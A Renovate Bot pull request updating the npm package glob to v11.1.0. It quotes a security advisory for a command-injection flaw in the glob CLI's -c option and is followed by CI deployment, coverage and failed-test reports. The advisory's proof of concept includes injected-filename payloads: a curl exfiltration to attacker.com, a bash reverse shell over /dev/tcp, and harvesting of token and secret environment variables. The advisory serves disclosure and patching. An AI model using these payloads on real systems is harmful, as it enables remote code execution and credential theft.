Deps: Update dependency glob to v11.1.0[SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
glob	11.0.3 → 11.1.0
glob	11.0.2 → 11.1.0

GitHub Vulnerability Alerts

CVE-2025-64756

Summary

The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.

Details

Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:

stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))

Technical Flow:

1. User runs glob -c <command> <pattern>
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using shell: true
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands

Affected Component:

• CLI Only: The vulnerability affects only the command-line interface
• Library Safe: The core glob library API (glob(), globSync(), streams/iterators) is not affected
• Shell Dependency: Exploitation requires shell metacharacter support (primarily POSIX systems)

Attack Surface:

• Files with names containing shell metacharacters: $(), backticks, ;, &, |, etc.
• Any directory where attackers can control filenames (PR branches, archives, user uploads)
• CI/CD pipelines using glob -c on untrusted content

PoC

Setup Malicious File:

mkdir test_directory && cd test_directory

# Create file with command injection payload in filename
touch '$(touch injected_poc)'

Trigger Vulnerability:

# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"

Result:

• The echo command executes normally
• Additionally: The $(touch injected_poc) in the filename is evaluated by the shell
• A new file injected_poc is created, proving command execution
• Any command can be injected this way with full user privileges

Advanced Payload Examples:

Data Exfiltration:

# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'

Reverse Shell:

# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'

Environment Variable Harvesting:

# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'

Impact

Arbitrary Command Execution:

• Commands execute with full privileges of the user running glob CLI
• No privilege escalation required - runs as current user
• Access to environment variables, file system, and network

Real-World Attack Scenarios:

1. CI/CD Pipeline Compromise:

• Malicious PR adds files with crafted names to repository
• CI pipeline uses glob -c to process files (linting, testing, deployment)
• Commands execute in CI environment with build secrets and deployment credentials
• Potential for supply chain compromise through artifact tampering

2. Developer Workstation Attack:

• Developer clones repository or extracts archive containing malicious filenames
• Local build scripts use glob -c for file processing
• Developer machine compromise with access to SSH keys, tokens, local services

3. Automated Processing Systems:

• Services using glob CLI to process uploaded files or external content
• File uploads with malicious names trigger command execution
• Server-side compromise with potential for lateral movement

4. Supply Chain Poisoning:

• Malicious packages or themes include files with crafted names
• Build processes using glob CLI automatically process these files
• Wide distribution of compromise through package ecosystems

Platform-Specific Risks:

• POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing
• Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL
• Mixed Environments: CI systems often use Linux containers regardless of developer platform

Affected Products

• Ecosystem: npm
• Package name: glob
• Component: CLI only (src/bin.mts)
• Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
• Introduced: v10.2.0 (first release with CLI containing -c/--cmd option)
• Patched versions: 11.1.0and 10.5.0

Scope Limitation:

• Library API Not Affected: Core glob functions (glob(), globSync(), async iterators) are safe
• CLI-Specific: Only the command-line interface with -c/--cmd option is vulnerable

Remediation

• Upgrade to glob@10.5.0, glob@11.1.0, or higher, as soon as possible.
• If any glob CLI actions fail, then convert commands containing positional arguments, to use the --cmd-arg/-g option instead.
• As a last resort, use --shell to maintain shell:true behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated on behalf of Nordcom AB by Renovate Bot.

[vercel]

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Preview	Comments	Updated (UTC)
commerce-demo	Error			Nov 18, 2025 0:52am
commerce-landing-demo	Error			Nov 18, 2025 0:52am

[github-actions]

Coverage Report

Status	Category	Percentage	Covered / Total
🔵	Lines	16.77%	2864 / 17075
🔵	Statements	16.77%	2864 / 17075
🔵	Functions	51.19%	279 / 545
🔵	Branches	66.11%	677 / 1024

File Coverage

No changed files found.

Generated in workflow #10649 for commit 41b8dd4 by the Vitest Coverage Report Action

[codecov]

❌ 2 Tests Failed:

Tests completed	Failed	Passed	Skipped
182	2	180	20

View the top 2 failed test(s) by shortest run time

apps/admin/src/utils/auth.adapter.test.ts > src/utils/auth.adapter.test.ts

Stack Traces | 0s run time

Error: querySrv ENOTFOUND _mongodb._tcp.dummy-string
⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯
Serialized Error: { errno: undefined, code: 'ENOTFOUND', syscall: 'querySrv', hostname: '_mongodb._tcp.dummy-string' }

apps/storefront/src/components/products/quantity-selector.test.tsx > components > QuantitySelector > updates the quantity when input value changes

Stack Traces | 1.04s run time

AssertionError: expected "spy" to be called with arguments: [ 5 ]

Number of calls: 0


Ignored nodes: comments, script, style
<html>
  <head />
  <body>
    <div>
      <section
        class="flex min-h-fit w-full overflow-hidden rounded-lg border-2 border-solid border-white bg-white p-0 leading-none opacity-50 drop-shadow transition-colors *:appearance-none *:text-center *:text-lg *:leading-none *:transition-colors"
      >
        <button
          aria-disabled="true"
          aria-label="decrease"
          class="transition-color duration-150 pointer-events-none cursor-not-allowed shadow-none aspect-[3/4] h-full select-none appearance-none rounded-none bg-transparent p-2 font-bold text-current"
          data-nosnippet="true"
          data-quantity-decrease="true"
          data-testid="quantity-decrease"
          disabled=""
          draggable="false"
          title="decrease"
          type="button"
        >
          –
        </button>
        <input
          aria-disabled="true"
          aria-label="quantity"
          class="rounded-lg pointer-events-none cursor-not-allowed h-full w-full grow appearance-none border-none bg-transparent text-sm font-bold outline-none focus:outline-none focus:ring-0"
          data-nosnippet="true"
          data-quantity-input="true"
          data-testid="quantity-input"
          disabled=""
          draggable="false"
          max="199999"
          min="1"
          pattern="[0-9]"
          placeholder="quantity"
          step="1"
          title="quantity"
          type="number"
          value="0"
        />
        <button
          aria-disabled="true"
          aria-label="increase"
          class="transition-color duration-150 pointer-events-none cursor-not-allowed shadow-none aspect-[3/4] h-full select-none appearance-none rounded-none bg-transparent p-2 font-bold text-current"
          data-nosnippet="true"
          data-quantity-increase="true"
          data-testid="quantity-increase"
          disabled=""
          draggable="false"
          title="increase"
          type="button"
        >
          +
        </button>
      </section>
    </div>
  </body>
</html>
 ❯ .../components/products/quantity-selector.test.tsx:27:36
 ❯ runWithExpensiveErrorDiagnosticsDisabled ../../node_modules/.pnpm/@testing-library+dom@10.1.0/node_modules/@.../dom/dist/config.js:47:12
 ❯ checkCallback ../../node_modules/.pnpm/@testing-library+dom@10.1.0/node_modules/@.../dom/dist/wait-for.js:124:77
 ❯ checkRealTimersCallback ../../node_modules/.pnpm/@testing-library+dom@10.1.0/node_modules/@.../dom/dist/wait-for.js:118:16
 ❯ Timeout.<anonymous> ../../node_modules/.pnpm/happy-dom@17.4..../src/window/BrowserWindow.ts:1431:16

To view more test analytics, go to the Test Analytics Dashboard
_{📋 Got 3 mins? Take this short survey to help us improve Test Analytics.}